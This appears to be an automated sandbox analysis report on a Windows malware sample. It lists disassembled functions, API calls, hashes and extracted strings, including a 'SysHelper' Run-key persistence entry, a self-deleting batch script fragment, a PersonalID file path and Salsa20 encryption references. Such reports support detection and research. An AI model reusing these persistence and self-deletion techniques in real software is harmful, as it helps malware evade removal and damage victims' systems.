                                                                                      • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004822E0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                        • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                        • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                        • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                        • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                        • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                        • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                        • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                      • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                      • SelectObject.GDI32(?,?), ref: 00482436
                                                                                      • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                      • DeleteDC.GDI32(?), ref: 0048244A
                                                                                      • DeleteDC.GDI32(?), ref: 00482450
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                      • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                      • API String ID: 151064509-1805842116
                                                                                      • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                      • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                      • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                      • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E670, Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0040E67F
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _malloc.LIBCMT ref: 0040E68B
                                                                                      • _wprintf.LIBCMT ref: 0040E69E
                                                                                      • _free.LIBCMT ref: 0040E6A4
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                      • _free.LIBCMT ref: 0040E6C5
                                                                                      • _malloc.LIBCMT ref: 0040E6CD
                                                                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                      • _sprintf.LIBCMT ref: 0040E720
                                                                                      • _wprintf.LIBCMT ref: 0040E732
                                                                                      • _wprintf.LIBCMT ref: 0040E73C
                                                                                      • _free.LIBCMT ref: 0040E745
                                                                                      Strings
                                                                                      • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                      • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                      • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                      • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                      • API String ID: 3901070236-1604013687
                                                                                      • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                      • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                      • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004382A2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 2299586839-711371036
                                                                                      • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                      • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                      • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C070, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                      • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wassert
                                                                                      • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                      • API String ID: 3993402318-1975116136
                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                      • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401178, Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0981c63a9f74f2cef49bc96d02ddff45abf4a099554e5cdf54aba45a1097e0a9
                                                                                      • Instruction ID: 4e82b3bf9c856ad283c1aa7fcc5662c157764fb6338ab4a3d9b9e059fef01284
                                                                                      • Opcode Fuzzy Hash: 0981c63a9f74f2cef49bc96d02ddff45abf4a099554e5cdf54aba45a1097e0a9
                                                                                      • Instruction Fuzzy Hash: D2C09B315002004FD735CA24DD613A273B277AB301F1588A5D1175B054D73A9015C506
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004124E0, Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                      • GetLastError.KERNEL32 ref: 00412509
                                                                                      • CloseHandle.KERNEL32 ref: 0041251C
                                                                                      • CloseHandle.KERNEL32 ref: 00412539
                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                      • GetLastError.KERNEL32 ref: 0041255B
                                                                                      • CloseHandle.KERNEL32 ref: 0041256E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$CreateErrorLastMutex
                                                                                      • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                      • API String ID: 2372642624-488272950
                                                                                      • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                      • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                      • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                      • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004635B0, Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                      • API String ID: 909875538-2733969777
                                                                                      • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                      • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                      • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                      • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004549A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                      • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                      • GetDesktopWindow.USER32 ref: 004549FB
                                                                                      • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                      • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                      • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                      • _wcsstr.LIBCMT ref: 00454A8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                      • String ID: Service-0x$_OPENSSL_isservice
                                                                                      • API String ID: 2112994598-1672312481
                                                                                      • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                      • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                      • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                      • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00454AE0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                      • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                      • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                        • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                      • vswprintf.LIBCMT ref: 00454B5D
                                                                                      • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                      • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                      • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                      • MessageBoxA.USER32 ref: 00454BD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                      • String ID: OPENSSL$OpenSSL: FATAL
                                                                                      • API String ID: 277090408-1348657634
                                                                                      • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                      • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                      • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                      • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412360, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                      • _memset.LIBCMT ref: 004123B6
                                                                                      • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                      • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                      • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                      • SysHelper, xrefs: 004123D6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                      • API String ID: 122392481-4165002228
                                                                                      • Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                      • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                      • Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
                                                                                      • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00418000, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                      • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                      • Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
                                                                                      • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0044F26C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                        • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                      • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                      • String ID: bad function call
                                                                                      • API String ID: 2464034642-3612616537
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00423576, Relevance: 15.3, APIs: 10, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 004235B1
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                      • __gmtime64_s.LIBCMT ref: 00423680
                                                                                      • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                      • __allrem.LIBCMT ref: 004236F3
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                      • __allrem.LIBCMT ref: 00423726
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                      • __allrem.LIBCMT ref: 0042375B
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                      • String ID:
                                                                                      • API String ID: 1503770280-0
                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00465480, Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                      • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                      • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                      • API String ID: 1717984340-2085858615
                                                                                      • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                      • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                      • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                      • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C740, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                      • _fgetws.LIBCMT ref: 0040C7BC
                                                                                      • _memmove.LIBCMT ref: 0040C89F
                                                                                      • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                      • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                      • API String ID: 2864494435-54166481
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
